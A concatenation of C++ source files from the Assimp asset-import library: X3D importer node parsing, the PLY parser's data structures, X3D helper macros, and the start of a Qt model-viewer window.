MACRO_USE_CHECKANDAPPLY(def, use, ENET_TriangleSet, ne);
}
else
{
// create and if needed - define new geometry object.
ne = new CX3DImporter_NodeElement_IndexedSet(CX3DImporter_NodeElement::ENET_TriangleSet, NodeElement_Cur);
if(!def.empty()) ne->ID = def;
CX3DImporter_NodeElement_Set& ne_alias = *((CX3DImporter_NodeElement_Set*)ne);
ne_alias.CCW = ccw;
ne_alias.ColorPerVertex = colorPerVertex;
ne_alias.NormalPerVertex = normalPerVertex;
ne_alias.Solid = solid;
// check for child nodes
if(!mReader->isEmptyElement())
{
ParseHelper_Node_Enter(ne);
MACRO_NODECHECK_LOOPBEGIN("TriangleSet");
// check for X3DComposedGeometryNodes
if(XML_CheckNode_NameEqual("Color")) { ParseNode_Rendering_Color(); continue; }
if(XML_CheckNode_NameEqual("ColorRGBA")) { ParseNode_Rendering_ColorRGBA(); continue; }
if(XML_CheckNode_NameEqual("Coordinate")) { ParseNode_Rendering_Coordinate(); continue; }
if(XML_CheckNode_NameEqual("Normal")) { ParseNode_Rendering_Normal(); continue; }
if(XML_CheckNode_NameEqual("TextureCoordinate")) { ParseNode_Texturing_TextureCoordinate(); continue; }
// check for X3DMetadataObject
if(!ParseHelper_CheckRead_X3DMetadataObject()) XML_CheckNode_SkipUnsupported("TriangleSet");
MACRO_NODECHECK_LOOPEND("TriangleSet");
ParseHelper_Node_Exit();
}// if(!mReader->isEmptyElement())
else
{
NodeElement_Cur->Child.push_back(ne);// add made object as child to current element
}
NodeElement_List.push_back(ne);// add element to node element list because its a new object in graph
}// if(!use.empty()) else
}
// <TriangleStripSet
// DEF="" ID
// USE="" IDREF
// ccw="true" SFBool [initializeOnly]
// colorPerVertex="true" SFBool [initializeOnly]
// normalPerVertex="true" SFBool [initializeOnly]
// solid="true" SFBool [initializeOnly]
// stripCount="" MFInt32 [inputOutput]
// >
// <!-- ComposedGeometryContentModel -->
// ComposedGeometryContentModel is the child-node content model corresponding to X3DComposedGeometryNodes. It can contain Color (or ColorRGBA), Coordinate,
// Normal and TextureCoordinate, in any order. No more than one instance of these nodes is allowed. Multiple VertexAttribute (FloatVertexAttribute,
// Matrix3VertexAttribute, Matrix4VertexAttribute) nodes can also be contained.
// A ProtoInstance node (with the proper node type) can be substituted for any node in this content model.
// </TriangleStripSet>
void X3DImporter::ParseNode_Rendering_TriangleStripSet()
{
std::string use, def;
bool ccw = true;
bool colorPerVertex = true;
std::list<int32_t> stripCount;
bool normalPerVertex = true;
bool solid = true;
CX3DImporter_NodeElement* ne( nullptr );
MACRO_ATTRREAD_LOOPBEG;
MACRO_ATTRREAD_CHECKUSEDEF_RET(def, use);
MACRO_ATTRREAD_CHECK_RET("ccw", ccw, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_RET("colorPerVertex", colorPerVertex, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_REF("stripCount", stripCount, XML_ReadNode_GetAttrVal_AsListI32);
MACRO_ATTRREAD_CHECK_RET("normalPerVertex", normalPerVertex, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_CHECK_RET("solid", solid, XML_ReadNode_GetAttrVal_AsBool);
MACRO_ATTRREAD_LOOPEND;
// if "USE" defined then find already defined element.
if(!use.empty())
{
MACRO_USE_CHECKANDAPPLY(def, use, ENET_TriangleStripSet, ne);
}
else
{
// check data
if(stripCount.size() == 0) throw DeadlyImportError("TriangleStripSet must contain not empty \"stripCount\" attribute.");
// create and if needed - define new geometry object.
ne = new CX3DImporter_NodeElement_Set(CX3DImporter_NodeElement::ENET_TriangleStripSet, NodeElement_Cur);
if(!def.empty()) ne->ID = def;
CX3DImporter_NodeElement_Set& ne_alias = *((CX3DImporter_NodeElement_Set*)ne);
ne_alias.CCW = ccw;
ne_alias.ColorPerVertex = colorPerVertex;
ne_alias.VertexCount = stripCount;
ne_alias.NormalPerVertex = normalPerVertex;
ne_alias.Solid = solid;
// create CoordIdx
size_t coord_num0, coord_num1, coord_num2;// indices of current triangle
bool odd_tri;// sequence of current triangle
size_t coord_num_sb;// index of first point of strip
ne_alias.CoordIndex.clear();
coord_num_sb = 0;
for(std::list<int32_t>::const_iterator vc_it = ne_alias.VertexCount.begin(); vc_it != ne_alias.VertexCount.end(); vc_it++)
{
if(*vc_it < 3) throw DeadlyImportError("TriangleStripSet. stripCount shall be greater than or equal to three.");
// set initial values for first triangle
coord_num0 = coord_num_sb;
coord_num1 = coord_num_sb + 1;
coord_num2 = coord_num_sb + 2;
odd_tri = true;
for(int32_t vc = 2; vc < *vc_it; vc++)
{
if(ccw)
{
// 0 2
// 1
ne_alias.CoordIndex.push_back(static_cast<int32_t>(coord_num0));
ne_alias.CoordIndex.push_back(static_cast<int32_t>(coord_num1));
ne_alias.CoordIndex.push_back(static_cast<int32_t>(coord_num2));
}
else
{
// 0 1
// 2
ne_alias.CoordIndex.push_back(static_cast<int32_t>(coord_num0));
ne_alias.CoordIndex.push_back(static_cast<int32_t>(coord_num2));
ne_alias.CoordIndex.push_back(static_cast<int32_t>(coord_num1));
}// if(ccw) else
ne_alias.CoordIndex.push_back(-1);// add face delimiter.
// prepare values for next triangle
if(odd_tri)
{
coord_num0 = coord_num2;
coord_num2++;
}
else
{
coord_num1 = coord_num2;
coord_num2 = coord_num1 + 1;
}
odd_tri = !odd_tri;
coord_num_sb = coord_num2;// that index will be start of next strip
}// for(int32_t vc = 2; vc < *vc_it; vc++)
}// for(std::list<int32_t>::const_iterator vc_it = ne_alias.VertexCount.begin(); vc_it != ne_alias.VertexCount.end(); vc_it++)
// check for child nodes
if(!mReader->isEmptyElement())
{
ParseHelper_Node_Enter(ne);
MACRO_NODECHECK_LOOPBEGIN("TriangleStripSet");
// check for X3DComposedGeometryNodes
if(XML_CheckNode_NameEqual("Color")) { ParseNode_Rendering_Color(); continue; }
if(XML_CheckNode_NameEqual("ColorRGBA")) { ParseNode_Rendering_ColorRGBA(); continue; }
if(XML_CheckNode_NameEqual("Coordinate")) { ParseNode_Rendering_Coordinate(); continue; }
if(XML_CheckNode_NameEqual("Normal")) { ParseNode_Rendering_Normal(); continue; }
if(XML_CheckNode_NameEqual("TextureCoordinate")) { ParseNode_Texturing_TextureCoordinate(); continue; }
// check for X3DMetadataObject
if(!ParseHelper_CheckRead_X3DMetadataObject()) XML_CheckNode_SkipUnsupported("TriangleStripSet");
MACRO_NODECHECK_LOOPEND("TriangleStripSet");
ParseHelper_Node_Exit();
}// if(!mReader->isEmptyElement())
else
{
NodeElement_Cur->Child.push_back(ne);// add made object as child to current element
}
NodeElement_List.push_back(ne);// add element to node element list because its a new object in graph
}// if(!use.empty()) else
}
// <Normal
// DEF="" ID
// USE="" IDREF
// vector="" MFVec3f [inputOutput]
// />
void X3DImporter::ParseNode_Rendering_Normal()
{
std::string use, def;
std::list<aiVector3D> vector;
CX3DImporter_NodeElement* ne;
MACRO_ATTRREAD_LOOPBEG;
MACRO_ATTRREAD_CHECKUSEDEF_RET(def, use);
MACRO_ATTRREAD_CHECK_REF("vector", vector, XML_ReadNode_GetAttrVal_AsListVec3f);
MACRO_ATTRREAD_LOOPEND;
// if "USE" defined then find already defined element.
if(!use.empty())
{
MACRO_USE_CHECKANDAPPLY(def, use, ENET_Normal, ne);
}
else
{
// create and if needed - define new geometry object.
ne = new CX3DImporter_NodeElement_Normal(NodeElement_Cur);
if(!def.empty()) ne->ID = def;
((CX3DImporter_NodeElement_Normal*)ne)->Value = vector;
// check for X3DMetadataObject childs.
if(!mReader->isEmptyElement())
ParseNode_Metadata(ne, "Normal");
else
NodeElement_Cur->Child.push_back(ne);// add made object as child to current element
NodeElement_List.push_back(ne);// add element to node element list because its a new object in graph
}// if(!use.empty()) else
}
}// namespace Assimp
#endif // !ASSIMP_BUILD_NO_X3D_IMPORTER
<|start_filename|>assimp/code/PlyParser.h<|end_filename|>
/*
Open Asset Import Library (assimp)
----------------------------------------------------------------------
Copyright (c) 2006-2016, assimp team
All rights reserved.
Redistribution and use of this software in source and binary forms,
with or without modification, are permitted provided that the
following conditions are met:
* Redistributions of source code must retain the above
copyright notice, this list of conditions and the
following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the
following disclaimer in the documentation and/or other
materials provided with the distribution.
* Neither the name of the assimp team, nor the names of its
contributors may be used to endorse or promote products
derived from this software without specific prior
written permission of the assimp team.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
----------------------------------------------------------------------
*/
/** @file Defines the helper data structures for importing PLY files */
#ifndef AI_PLYFILEHELPER_H_INC
#define AI_PLYFILEHELPER_H_INC
#include "ParsingUtils.h"
#include <vector>
namespace Assimp
{
// http://local.wasp.uwa.edu.au/~pbourke/dataformats/ply/
// http://w3.impa.br/~lvelho/outgoing/sossai/old/ViHAP_D4.4.2_PLY_format_v1.1.pdf
// http://www.okino.com/conv/exp_ply.htm
namespace PLY
{
// ---------------------------------------------------------------------------------
/*
name type number of bytes
---------------------------------------
char character 1
uchar unsigned character 1
short short integer 2
ushort unsigned short integer 2
int integer 4
uint unsigned integer 4
float single-precision float 4
double double-precision float 8
int8
int16
uint8 ... forms are also used
*/
enum EDataType
{
EDT_Char = 0x0u,
EDT_UChar,
EDT_Short,
EDT_UShort,
EDT_Int,
EDT_UInt,
EDT_Float,
EDT_Double,
// Marks invalid entries
EDT_INVALID
};
// ---------------------------------------------------------------------------------
/** \brief Specifies semantics for PLY element properties
*
* Semantics define the usage of a property, e.g. x coordinate
*/
enum ESemantic
{
//! vertex position x coordinate
EST_XCoord = 0x0u,
//! vertex position x coordinate
EST_YCoord,
//! vertex position x coordinate
EST_ZCoord,
//! vertex normal x coordinate
EST_XNormal,
//! vertex normal y coordinate
EST_YNormal,
//! vertex normal z coordinate
EST_ZNormal,
//! u texture coordinate
EST_UTextureCoord,
//! v texture coordinate
EST_VTextureCoord,
//! vertex colors, red channel
EST_Red,
//! vertex colors, green channel
EST_Green,
//! vertex colors, blue channel
EST_Blue,
//! vertex colors, alpha channel
EST_Alpha,
//! vertex index list
EST_VertexIndex,
//! texture index
EST_TextureIndex,
//! texture coordinates (stored as element of a face)
EST_TextureCoordinates,
//! material index
EST_MaterialIndex,
//! ambient color, red channel
EST_AmbientRed,
//! ambient color, green channel
EST_AmbientGreen,
//! ambient color, blue channel
EST_AmbientBlue,
//! ambient color, alpha channel
EST_AmbientAlpha,
//! diffuse color, red channel
EST_DiffuseRed,
//! diffuse color, green channel
EST_DiffuseGreen,
//! diffuse color, blue channel
EST_DiffuseBlue,
//! diffuse color, alpha channel
EST_DiffuseAlpha,
//! specular color, red channel
EST_SpecularRed,
//! specular color, green channel
EST_SpecularGreen,
//! specular color, blue channel
EST_SpecularBlue,
//! specular color, alpha channel
EST_SpecularAlpha,
//! specular power for phong shading
EST_PhongPower,
//! opacity between 0 and 1
EST_Opacity,
//! Marks invalid entries
EST_INVALID
};
// ---------------------------------------------------------------------------------
/** \brief Specifies semantics for PLY elements
*
* Semantics define the usage of an element, e.g. vertex or material
*/
enum EElementSemantic
{
//! The element is a vertex
EEST_Vertex = 0x0u,
//! The element is a face description (index table)
EEST_Face,
//! The element is a tristrip description (index table)
EEST_TriStrip,
//! The element is an edge description (ignored)
EEST_Edge,
//! The element is a material description
EEST_Material,
//! Marks invalid entries
EEST_INVALID
};
// ---------------------------------------------------------------------------------
/** \brief Helper class for a property in a PLY file.
*
* This can e.g. be a part of the vertex declaration
*/
class Property
{
public:
//! Default constructor
Property()
: eType (EDT_Int),
Semantic(),
bIsList(false),
eFirstType(EDT_UChar)
{}
//! Data type of the property
EDataType eType;
//! Semantical meaning of the property
ESemantic Semantic;
//! Of the semantic of the property could not be parsed:
//! Contains the semantic specified in the file
std::string szName;
//! Specifies whether the data type is a list where
//! the first element specifies the size of the list
bool bIsList;
EDataType eFirstType;
// -------------------------------------------------------------------
//! Parse a property from a string. The end of the
//! string is either '\n', '\r' or '\0'. Return value is false
//! if the input string is NOT a valid property (E.g. does
//! not start with the "property" keyword)
static bool ParseProperty (const char* pCur, const char** pCurOut,
Property* pOut);
// -------------------------------------------------------------------
//! Parse a data type from a string
static EDataType ParseDataType(const char* pCur,const char** pCurOut);
// -------------------------------------------------------------------
//! Parse a semantic from a string
static ESemantic ParseSemantic(const char* pCur,const char** pCurOut);
};
// ---------------------------------------------------------------------------------
/** \brief Helper class for an element in a PLY file.
*
* This can e.g. be the vertex declaration. Elements contain a
* well-defined number of properties.
*/
class Element
{
public:
//! Default constructor
Element()
: eSemantic (EEST_INVALID)
, NumOccur(0)
{}
//! List of properties assigned to the element
//! std::vector to support operator[]
std::vector<Property> alProperties;
//! Semantic of the element
EElementSemantic eSemantic;
//! Of the semantic of the element could not be parsed:
//! Contains the semantic specified in the file
std::string szName;
//! How many times will the element occur?
unsigned int NumOccur;
// -------------------------------------------------------------------
//! Parse an element from a string.
//! The function will parse all properties contained in the
//! element, too.
static bool ParseElement (const char* pCur, const char** pCurOut,
Element* pOut);
// -------------------------------------------------------------------
//! Parse a semantic from a string
static EElementSemantic ParseSemantic(const char* pCur,
const char** pCurOut);
};
// ---------------------------------------------------------------------------------
/** \brief Instance of a property in a PLY file
*/
class PropertyInstance
{
public:
//! Default constructor
PropertyInstance ()
{}
union ValueUnion
{
//! uInt32 representation of the property. All
// uint types are automatically converted to uint32
uint32_t iUInt;
//! Int32 representation of the property. All
// int types are automatically converted to int32
int32_t iInt;
//! Float32 representation of the property
float fFloat;
//! Float64 representation of the property
double fDouble;
};
// -------------------------------------------------------------------
//! List of all values parsed. Contains only one value
// for non-list properties
std::vector<ValueUnion> avList;
// -------------------------------------------------------------------
//! Parse a property instance
static bool ParseInstance (const char* pCur,const char** pCurOut,
const Property* prop, PropertyInstance* p_pcOut);
// -------------------------------------------------------------------
//! Parse a property instance in binary format
static bool ParseInstanceBinary (const char* pCur,const char** pCurOut,
const Property* prop, PropertyInstance* p_pcOut,bool p_bBE);
// -------------------------------------------------------------------
//! Get the default value for a given data type
static ValueUnion DefaultValue(EDataType eType);
// -------------------------------------------------------------------
//! Parse a value
static bool ParseValue(const char* pCur,const char** pCurOut,
EDataType eType,ValueUnion* out);
// -------------------------------------------------------------------
//! Parse a binary value
static bool ParseValueBinary(const char* pCur,const char** pCurOut,
EDataType eType,ValueUnion* out,bool p_bBE);
// -------------------------------------------------------------------
//! Convert a property value to a given type TYPE
template <typename TYPE>
static TYPE ConvertTo(ValueUnion v, EDataType eType);
};
// ---------------------------------------------------------------------------------
/** \brief Class for an element instance in a PLY file
*/
class ElementInstance
{
public:
//! Default constructor
ElementInstance ()
{}
//! List of all parsed properties
std::vector< PropertyInstance > alProperties;
// -------------------------------------------------------------------
//! Parse an element instance
static bool ParseInstance (const char* pCur,const char** pCurOut,
const Element* pcElement, ElementInstance* p_pcOut);
// -------------------------------------------------------------------
//! Parse a binary element instance
static bool ParseInstanceBinary (const char* pCur,const char** pCurOut,
const Element* pcElement, ElementInstance* p_pcOut,bool p_bBE);
};
// ---------------------------------------------------------------------------------
/** \brief Class for an element instance list in a PLY file
*/
class ElementInstanceList
{
public:
//! Default constructor
ElementInstanceList ()
{}
//! List of all element instances
std::vector< ElementInstance > alInstances;
// -------------------------------------------------------------------
//! Parse an element instance list
static bool ParseInstanceList (const char* pCur,const char** pCurOut,
const Element* pcElement, ElementInstanceList* p_pcOut);
// -------------------------------------------------------------------
//! Parse a binary element instance list
static bool ParseInstanceListBinary (const char* pCur,const char** pCurOut,
const Element* pcElement, ElementInstanceList* p_pcOut,bool p_bBE);
};
// ---------------------------------------------------------------------------------
/** \brief Class to represent the document object model of an ASCII or binary
* (both little and big-endian) PLY file
*/
class DOM
{
public:
//! Default constructor
DOM()
{}
//! Contains all elements of the file format
std::vector<Element> alElements;
//! Contains the real data of each element's instance list
std::vector<ElementInstanceList> alElementData;
//! Parse the DOM for a PLY file. The input string is assumed
//! to be terminated with zero
static bool ParseInstance (const char* pCur,DOM* p_pcOut);
static bool ParseInstanceBinary (const char* pCur,
DOM* p_pcOut,bool p_bBE);
//! Skip all comment lines after this
static bool SkipComments (const char* pCur,const char** pCurOut);
private:
// -------------------------------------------------------------------
//! Handle the file header and read all element descriptions
bool ParseHeader (const char* pCur,const char** pCurOut, bool p_bBE);
// -------------------------------------------------------------------
//! Read in all element instance lists
bool ParseElementInstanceLists (const char* pCur,const char** pCurOut);
// -------------------------------------------------------------------
//! Read in all element instance lists for a binary file format
bool ParseElementInstanceListsBinary (const char* pCur,
const char** pCurOut,bool p_bBE);
};
// ---------------------------------------------------------------------------------
/** \brief Helper class to represent a loaded PLY face
*/
class Face
{
public:
Face()
: iMaterialIndex(0xFFFFFFFF)
{
// set all indices to zero by default
mIndices.resize(3,0);
}
public:
//! List of vertex indices
std::vector<unsigned int> mIndices;
//! Material index
unsigned int iMaterialIndex;
};
// ---------------------------------------------------------------------------------
template <typename TYPE>
inline TYPE PLY::PropertyInstance::ConvertTo(
PLY::PropertyInstance::ValueUnion v, PLY::EDataType eType)
{
switch (eType)
{
case EDT_Float:
return (TYPE)v.fFloat;
case EDT_Double:
return (TYPE)v.fDouble;
case EDT_UInt:
case EDT_UShort:
case EDT_UChar:
return (TYPE)v.iUInt;
case EDT_Int:
case EDT_Short:
case EDT_Char:
return (TYPE)v.iInt;
default: ;
};
return (TYPE)0;
}
} // Namespace PLY
} // Namespace AssImp
#endif // !! include guard
<|start_filename|>assimp/code/X3DImporter_Macro.hpp<|end_filename|>
/*
Open Asset Import Library (assimp)
----------------------------------------------------------------------
Copyright (c) 2006-2016, assimp team
All rights reserved.
Redistribution and use of this software in source and binary forms,
with or without modification, are permitted provided that the
following conditions are met:
* Redistributions of source code must retain the above
copyright notice, this list of conditions and the
following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the
following disclaimer in the documentation and/or other
materials provided with the distribution.
* Neither the name of the assimp team, nor the names of its
contributors may be used to endorse or promote products
derived from this software without specific prior
written permission of the assimp team.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
----------------------------------------------------------------------
*/
/// \file X3DImporter_Macro.hpp
/// \brief Useful macrodefines.
/// \date 2015-2016
/// \author <EMAIL>
#ifndef X3DIMPORTER_MACRO_HPP_INCLUDED
#define X3DIMPORTER_MACRO_HPP_INCLUDED
/// \def MACRO_USE_CHECKANDAPPLY(pDEF, pUSE, pNE)
/// Used for regular checking while attribute "USE" is defined.
/// \param [in] pDEF - string holding "DEF" value.
/// \param [in] pUSE - string holding "USE" value.
/// \param [in] pType - type of element to find.
/// \param [out] pNE - pointer to found node element.
#define MACRO_USE_CHECKANDAPPLY(pDEF, pUSE, pType, pNE) \
do { \
XML_CheckNode_MustBeEmpty(); \
if(!pDEF.empty()) Throw_DEF_And_USE(); \
if(!FindNodeElement(pUSE, CX3DImporter_NodeElement::pType, &pNE)) Throw_USE_NotFound(pUSE); \
\
NodeElement_Cur->Child.push_back(pNE);/* add found object as child to current element */ \
} while(false)
/// \def MACRO_ATTRREAD_LOOPBEG
/// Begin of loop that read attributes values.
#define MACRO_ATTRREAD_LOOPBEG \
for(int idx = 0, idx_end = mReader->getAttributeCount(); idx < idx_end; idx++) \
{ \
std::string an(mReader->getAttributeName(idx));
/// \def MACRO_ATTRREAD_LOOPEND
/// End of loop that read attributes values.
#define MACRO_ATTRREAD_LOOPEND \
Throw_IncorrectAttr(an); \
}
/// \def MACRO_ATTRREAD_CHECK_REF
/// Check curent attribute name and if it equal to requested then read value. Result write to output variable by reference. If result was read then
/// "continue" will called.
/// \param [in] pAttrName - attribute name.
/// \param [out] pVarName - output variable name.
/// \param [in] pFunction - function which read attribute value and write it to pVarName.
#define MACRO_ATTRREAD_CHECK_REF(pAttrName, pVarName, pFunction) \
if(an == pAttrName) \
{ \
pFunction(idx, pVarName); \
continue; \
}
/// \def MACRO_ATTRREAD_CHECK_RET
/// Check curent attribute name and if it equal to requested then read value. Result write to output variable using return value of \ref pFunction.
/// If result was read then "continue" will called.
/// \param [in] pAttrName - attribute name.
/// \param [out] pVarName - output variable name.
/// \param [in] pFunction - function which read attribute value and write it to pVarName.
#define MACRO_ATTRREAD_CHECK_RET(pAttrName, pVarName, pFunction) \
if(an == pAttrName) \
{ \
pVarName = pFunction(idx); \
continue; \
}
/// \def MACRO_ATTRREAD_CHECKUSEDEF_RET
/// Compact variant for checking "USE" and "DEF". Also skip bbox attributes: "bboxCenter", "bboxSize".
/// If result was read then "continue" will called.
/// \param [out] pDEF_Var - output variable name for "DEF" value.
/// \param [out] pUSE_Var - output variable name for "USE" value.
#define MACRO_ATTRREAD_CHECKUSEDEF_RET(pDEF_Var, pUSE_Var) \
MACRO_ATTRREAD_CHECK_RET("DEF", pDEF_Var, mReader->getAttributeValue); \
MACRO_ATTRREAD_CHECK_RET("USE", pUSE_Var, mReader->getAttributeValue); \
if(an == "bboxCenter") continue; \
if(an == "bboxSize") continue; \
if(an == "containerField") continue; \
do {} while(false)
/// \def MACRO_NODECHECK_LOOPBEGIN(pNodeName)
/// Begin of loop of parsing child nodes. Do not add ';' at end.
/// \param [in] pNodeName - current node name.
#define MACRO_NODECHECK_LOOPBEGIN(pNodeName) \
do { \
bool close_found = false; \
\
while(mReader->read()) \
{ \
if(mReader->getNodeType() == irr::io::EXN_ELEMENT) \
{
/// \def MACRO_NODECHECK_LOOPEND(pNodeName)
/// End of loop of parsing child nodes.
/// \param [in] pNodeName - current node name.
#define MACRO_NODECHECK_LOOPEND(pNodeName) \
}/* if(mReader->getNodeType() == irr::io::EXN_ELEMENT) */ \
else if(mReader->getNodeType() == irr::io::EXN_ELEMENT_END) \
{ \
if(XML_CheckNode_NameEqual(pNodeName)) \
{ \
close_found = true; \
\
break; \
} \
}/* else if(mReader->getNodeType() == irr::io::EXN_ELEMENT_END) */ \
}/* while(mReader->read()) */ \
\
if(!close_found) Throw_CloseNotFound(pNodeName); \
\
} while(false)
#define MACRO_NODECHECK_METADATA(pNodeName) \
MACRO_NODECHECK_LOOPBEGIN(pNodeName) \
/* and childs must be metadata nodes */ \
if(!ParseHelper_CheckRead_X3DMetadataObject()) XML_CheckNode_SkipUnsupported(pNodeName); \
MACRO_NODECHECK_LOOPEND(pNodeName)
/// \def MACRO_FACE_ADD_QUAD_FA(pCCW, pOut, pIn, pP1, pP2, pP3, pP4)
/// Add points as quad. Means that pP1..pP4 set in CCW order.
#define MACRO_FACE_ADD_QUAD_FA(pCCW, pOut, pIn, pP1, pP2, pP3, pP4) \
do { \
if(pCCW) \
{ \
pOut.push_back(pIn[pP1]); \
pOut.push_back(pIn[pP2]); \
pOut.push_back(pIn[pP3]); \
pOut.push_back(pIn[pP4]); \
} \
else \
{ \
pOut.push_back(pIn[pP4]); \
pOut.push_back(pIn[pP3]); \
pOut.push_back(pIn[pP2]); \
pOut.push_back(pIn[pP1]); \
} \
} while(false)
/// \def MACRO_FACE_ADD_QUAD(pCCW, pOut, pP1, pP2, pP3, pP4)
/// Add points as quad. Means that pP1..pP4 set in CCW order.
#define MACRO_FACE_ADD_QUAD(pCCW, pOut, pP1, pP2, pP3, pP4) \
do { \
if(pCCW) \
{ \
pOut.push_back(pP1); \
pOut.push_back(pP2); \
pOut.push_back(pP3); \
pOut.push_back(pP4); \
} \
else \
{ \
pOut.push_back(pP4); \
pOut.push_back(pP3); \
pOut.push_back(pP2); \
pOut.push_back(pP1); \
} \
} while(false)
#endif // X3DIMPORTER_MACRO_HPP_INCLUDED
<|start_filename|>assimp/tools/assimp_qt_viewer/mainwindow.cpp<|end_filename|>
/// \file mainwindow.hpp
/// \brief Main window and algorhytms.
/// \author <EMAIL>
/// \date 2016
#include "mainwindow.hpp"
#include "ui_mainwindow.h"
// Header files, Assimp.
#include <assimp/Exporter.hpp>
#include <assimp/postprocess.h>
#ifndef __unused
#define __unused __attribute__((unused))
#endif // __unused
/**********************************/
/************ Functions ***********/
/**********************************/
/********************************************************************/
/********************* Import/Export functions **********************/
/********************************************************************/
void MainWindow::ImportFile(const QString &pFileName)
{
using namespace Assimp;
QTime time_begin = QTime::currentTime();
if(mScene != nullptr)
{
mImporter.FreeScene();
mGLView->FreeScene();
}
// Try to import scene.
mScene = mImporter.ReadFile(pFileName.toStdString(), aiProcess_Triangulate | aiProcess_GenNormals | aiProcess_ValidateDataStructure | \
aiProcess_GenUVCoords | aiProcess_TransformUVCoords | aiProcess_FlipUVs);
if(mScene != nullptr)
{
ui->lblLoadTime->setText(QString("%1").arg(time_begin.secsTo(QTime::currentTime())));
LogInfo("Import done: " + pFileName);
// Prepare widgets for new scene.
ui->leFileName->setText(pFileName.right(pFileName.length() - pFileName.lastIndexOf('/') - 1));
ui->lstLight->clear();
ui->lstCamera->clear();
ui->cbxLighting->setChecked(true), mGLView->Lighting_Enable();
ui->cbxBBox->setChecked(false); mGLView->Enable_SceneBBox(false);
ui->cbxTextures->setChecked(true), mGLView->Enable_Textures(true);
//
// Fill info labels
//
// Cameras
ui->lblCameraCount->setText(QString("%1").arg(mScene->mNumCameras));
// Lights
ui->lblLightCount->setText(QString("%1").arg(mScene->mNumLights));
// Meshes, faces, vertices.
size_t qty_face = 0;
size_t qty_vert = 0;
for(size_t idx_mesh = 0; idx_mesh < mScene->mNumMeshes; idx_mesh++)
{
qty_face += mScene->mMeshes[idx_mesh]->mNumFaces;
qty_vert += mScene->mMeshes[idx_mesh]->mNumVertices;
}
ui->lblMeshCount->setText(QString("%1").arg(mScene->mNumMeshes));
ui->lblFaceCount->setText(QString("%1").arg(qty_face));
ui->lblVertexCount->setText(QString("%1").arg(qty_vert));
// Animation
if(mScene->mNumAnimations)
ui->lblHasAnimation->setText("yes");
else
ui->lblHasAnimation->setText("no");
//
// Set scene for GL viewer.
//
mGLView->SetScene(mScene, pFileName);
// Select first camera
ui->lstCamera->setCurrentRow(0);
mGLView->Camera_Set(0);
// Scene is loaded, do first rendering.
LogInfo("Scene is ready for rendering.");
mGLView->updateGL();
}
else
{
ui->lblLoadTime->clear();
LogError(QString("Error parsing \'%1\' : \'%2\'").arg(pFileName).arg(mImporter.GetErrorString()));
}// if(mScene != nullptr)
}
/********************************************************************/
/************************ Logging functions *************************/
/********************************************************************/
void MainWindow::LogInfo(const QString& pMessage)
{
Assimp::DefaultLogger::get()->info(pMessage.toStdString());
}
void MainWindow::LogError(const QString& pMessage)
{
Assimp::DefaultLogger::get()->error(pMessage.toStdString());
}
/********************************************************************/
/*********************** Overrided functions ************************/
/********************************************************************/
void MainWindow::mousePressEvent(QMouseEvent* pEvent)
{
if(pEvent->button() & Qt::LeftButton)
mPosition_Pressed_LMB = pEvent->pos();
else if(pEvent->button() & Qt::RightButton)
mPosition_Pressed_RMB = pEvent->pos();
}
void MainWindow::mouseMoveEvent(QMouseEvent* pEvent)
{
if(pEvent->buttons() & Qt::LeftButton)
{
GLfloat dx = 180 * GLfloat(pEvent->x() - mPosition_Pressed_LMB.x()) / mGLView->width();
GLfloat dy = 180 * GLfloat(pEvent->y() - mPosition_Pressed_LMB.y()) / mGLView->height();
if(pEvent->modifiers() & Qt::ShiftModifier)
mGLView->Camera_RotateScene(dy, 0, dx);// Rotate around oX and oZ axises.
else
mGLView->Camera_RotateScene(dy, dx, 0);// Rotate around oX and oY axises.
mGLView->updateGL();
mPosition_Pressed_LMB = pEvent->pos();
}
if(pEvent->buttons() & Qt::RightButton)
{
GLfloat dx = 180 * GLfloat(pEvent->x() - mPosition_Pressed_RMB.x()) / mGLView->width();
GLfloat dy = 180 * GLfloat(pEvent->y() - mPosition_Pressed_RMB.y()) / mGLView->height();
if(pEvent->modifiers() & Qt::ShiftModifier)
mGLView->Camera_Rotate(dy, 0, dx);// Rotate around oX and oZ axises.
else
